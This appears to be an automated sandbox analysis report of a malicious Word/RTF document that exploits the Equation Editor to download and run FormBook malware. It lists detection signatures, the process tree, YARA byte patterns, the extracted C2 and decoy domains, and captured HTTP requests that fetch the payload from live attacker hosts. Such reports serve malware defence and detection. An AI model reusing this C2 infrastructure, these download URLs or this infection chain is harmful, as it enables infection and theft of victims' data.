Windows Analysis Report
Revised RFQ-PO180911.doc

Overview

General Information

Sample Name: Revised RFQ-PO180911.doc
Analysis ID: 635413
MD5: afaa3f4a9a241593ea30e05773c22980
SHA1: 1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
SHA256: 25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
Tags: doc, RFQ

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign process
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc.)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2068 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1544 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: C6E799EEEBA0345DE98B4E9A6AC76B82)
      • dvukljmnr.exe (PID: 2844 cmdline: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw MD5: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1)
        • dvukljmnr.exe (PID: 940 cmdline: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw MD5: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • wuapp.exe (PID: 2996 cmdline: C:\Windows\SysWOW64\wuapp.exe MD5: C8EBA45CEF271BED6C2F0E1965D229EA)
              • cmd.exe (PID: 1820 cmdline: /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
Source | Rule | Description | Author | Strings
Source: Revised RFQ-PO180911.doc | Rule: INDICATOR_RTF_MalVer_Objects | Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | Author: ditekSHen
  • 0x5c:$obj2: \objdata
  • 0x7d:$obj2: \objdata
  • 0x315:$obj3: \objupdate
Source | Rule | Description | Author | Strings
Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
    Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
      Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      (28 entries in total; remaining entries not shown)
      Source | Rule | Description | Author | Strings
      Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
        Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          (8 entries in total; remaining entries not shown)

          Exploits

          Source: Network Connection, Author: Joe Security, Data: DestinationIp: 194.9.94.86, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1544, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
          Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1544, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe
          No Snort rule has matched

          AV Detection

          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
          Source: Revised RFQ-PO180911.doc, Virustotal: Detection: 31%
          Source: Revised RFQ-PO180911.doc, ReversingLabs: Detection: 32%
          Source: Yara match, File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: http://sanbarts.com/cssati.exe, Avira URL Cloud: Label: malware
          Source: http://www.sanbarts.com/cssati.exe, Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp, Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe, ReversingLabs: Detection: 61%
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe, ReversingLabs: Detection: 69%
          Source: C:\Users\user\AppData\Roaming\word.exe, ReversingLabs: Detection: 61%
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.dvukljmnr.exe.160000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.dvukljmnr.exe.400000.7.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.dvukljmnr.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.dvukljmnr.exe.400000.9.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 194.9.94.86 Port: 80
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 45.120.185.113 Port: 80
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.dr, Stream path '_1715191568/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
          Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\word.exe, Code function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\word.exe, Code function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\AppData\Roaming\word.exe, Code function: 4_2_004026A1 FindFirstFileA,
          Source: global traffic, DNS query: name: sanbarts.com
          Source: global traffic, TCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80

          Networking

          Source: C:\Windows\explorer.exe, Domain query: www.paypal-caseid521.com
          Source: C:\Windows\explorer.exe, Network Connect: 98.137.244.37 80
          Source: C:\Windows\explorer.exe, Domain query: www.storyofsol.com
          Source: C:\Windows\explorer.exe, Domain query: www.createacarepack.com
          Source: Malware configuration extractor, URLs: www.rthearts.com/nk6l/
          Source: Joe Sandbox View, ASN Name: LOOPIASE LOOPIASE
          Source: Joe Sandbox View, ASN Name: YAHOO-GQ1US YAHOO-GQ1US
          Source: global traffic, HTTP traffic detected:
            GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1
            Host: www.createacarepack.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: Joe Sandbox View, IP Address: 194.9.94.86 194.9.94.86
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 26 May 2022 00:40:19 GMTAccept-Ranges: bytesETag: "4042e42c9970d81:0"Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 27 May 2022 19:20:07 GMTContent-Length: 299113Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 71 4a a8 a1 10 24 fb a1 10 24 fb a1 10 24 fb 2f 18 7b fb a3 10 24 fb a1 10 25 fb 3b 10 24 fb 22 18 79 fb b0 10 24 fb f5 33 14 fb a8 10 24 fb 66 16 22 fb a0 10 24 fb 52 69 63 68 a1 10 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b6 ce 69 46 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 fa 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7a 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 af 01 00 00 90 00 00 00 04 00 
00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected:
            GET /cssati.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: sanbarts.com
            Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected:
            GET /cssati.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Connection: Keep-Alive
            Host: www.sanbarts.com
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Fri, 27 May 2022 19:21:49 GMT
            P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
            Vary: Accept-Encoding
            Content-Length: 73
            Content-Type: text/html; charset=iso-8859-1
            Age: 0
            Connection: close
            Server: ATS
            Data Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64
            Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://java.sun.com
